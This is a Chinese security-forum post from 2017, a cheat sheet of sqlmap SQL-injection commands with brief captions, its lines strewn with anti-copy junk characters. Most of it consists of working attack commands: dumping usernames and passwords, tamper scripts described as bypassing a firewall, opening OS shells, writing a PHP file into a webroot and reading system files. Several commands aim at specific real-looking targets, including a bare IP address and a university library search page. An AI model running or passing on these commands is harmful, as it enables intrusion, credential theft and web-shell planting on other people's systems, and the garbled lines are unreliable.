找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1610|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap- ~' g' y' c8 D8 O- }

! m/ C/ V( Y* C$ C% I, yupdate :::::>     in the folder   after  execute    following   order : svn update
  z7 Z4 X/ k4 F  K0 _- Z: H
0 j; U, r: s+ v! ^9 }+ i# N; @( `sqlmap.py -r 1.txt --current-db( G' }7 A$ G: d: s6 U$ ^% W
* K/ y4 s% f' L1 m6 Z$ m3 R% t
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
7 E: k* C" m: x  X/ J& W" {0 R" B  A8 n
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
; u7 T5 j) [* G! m1 F6 d猜解数据库
% Q/ L5 T# ?+ M2 C& t9 [$ z./sqlmap.py -u "injection-url" --dbs
/ Z& F4 H& \  T7 zsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"/ L7 a, o6 B( l$ d& B; Q5 [" }/ a: @

# B% K8 b. F% O5 \2 E5 b: @& g猜解表名. j* N6 ^, }" ?. r9 M1 a
./sqlmap.py -u "injection-url" -D database_name --tables/ x5 P2 @' }4 \, q( U9 J
/ D& H/ j( ?; Z6 R
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"' D7 O/ m6 r7 @" h! z6 u8 D7 S
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 1 ~, x+ ~2 P& C) A1 v

1 U) _+ r9 b' D6 W* ^0 bsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 ^  B7 H1 N, A4 A, _# K) K# I& A2 {9 s# r; H5 S
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
3 ]6 R) V" F+ J8 {8 Psqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py": S5 _) a% h7 \& n
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
$ U8 {+ d1 i7 }sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
! B( S4 }- f- z& K8 G2 |9 r0 ]& t5 g3 [' e$ r' q/ {- U
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"! x3 Y( o' O1 a- K8 Q
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
) g; E' X5 ~  p8 {sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
2 z# S8 B7 ?) n* ssqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py") G7 ?8 u; I5 t9 @
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
+ n0 K7 q' k" A( S. {" H2 B* V- l8 p) W* \% d
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了, j& @7 X. ^  [) z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py". K8 ?7 ?9 H2 N2 c- H
% X) F8 c1 p" `( b# O
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"- ]8 w! s9 u4 a" L: Z- F
猜解列名7 i$ F- `3 h8 I6 E# T! h% [2 R
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
2 V( O1 N0 @) D% f7 v' Q* K" u& K! P& _& c) R! z4 G$ |$ _
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" # G. e0 Q3 h# r' e. V* {
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
; @# G3 ?9 p; P- Lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
6 F9 E# N# K  S) R1 M1 {+ }; P
  U9 ?* e+ s9 W9 G, }0 b8 Lsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
  x* s$ |0 M1 v# r* j" ^3 t&submit=Go
' Z+ D/ _: r' V猜解值2 |% J4 u" Q- H8 J4 S# p
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& G5 P" S7 v& t1 Z6 T5 v% ^========================================================
' F4 S) W' ?% x3 v5 e! S( j搜索表名中包括mana字符的7 {( Y0 b  y$ K, Y; C
/sqlmap.py -u "injection-url" -T mana --search
1 m/ F* a) T2 O* A) i" i返回一个交互式sql shell
, V) M. T, C- _7 r# T1 |& d& a/ k/sqlmap.py -u "injection-url" --sql-shell
! q8 E. b: P: n! b读取指定文件(需权限)
) X8 b0 M' p$ X4 n/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"& {: i9 s/ m  Y# z& q. x
查看当前 用户 及 数据库
. j& R8 Z; Y( [/sqlmap.py -u "injection-url" --current-user --current-db
% t3 I5 Y' a7 w  Z% C5 z0 `$ A: K本地文件 写入 远程目标绝对路径% b" h: v: V. M$ l
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径3 _% G) F% j  _7 |# C
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
" Q2 E; Q0 T7 u. U6 s* c; w1 u; o, f- e  z$ x
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径8 {" V$ u  W) `$ K! N# F
查看某用的权限( q! \5 `, n6 {* j9 W
/sqlmap.py -u "injection-url" --privileges -U root0 [2 N* e9 c/ H- u( j# C3 c2 O: v
查看当前用户是否为dba1 G3 W+ t* C9 L; F6 X* f; Z
/sqlmap.py -u "injection-url" --is-dba/ H2 P, \$ m2 H" {3 D
读取所有数据库用户或指定数据库用户的密码1 o4 O9 g& S$ o& G4 K8 X* h* w
sqlmap.py -r 1.txt --users --passwords: S7 m; i) O% h7 ^3 d9 o( S
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" $ [- a' n- t7 E2 u

; _8 |$ U7 Q2 M0 z' `$ P1 a/sqlmap.py -u "injection-url" --passwords -U root
9 c& `0 ^- N2 h* i5 i# O( i( Y$ F8 {, o* A9 w2 }" P" v
--start&&--stop 与 --first&&--last 的区别  ~1 o3 v/ x* R  }1 o% S* N
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
7 L7 d0 c' N; m, |* o. a' ^, v
. a2 x+ {8 Y/ x$ O& g从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
' M+ Z- J* f3 v5 O/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables. J/ \2 K& G* B7 G8 _" m9 s, {
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
1 o: d- [+ b& q% n# l( D% b; ~- ^6 ^* `& {( q  T3 U8 q, Y
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
7 \5 y# T8 _* t0 d  T  c: [* B* d9 N/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"; G  t& b5 f$ D
! |1 a8 @3 j1 ~; P& W- s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表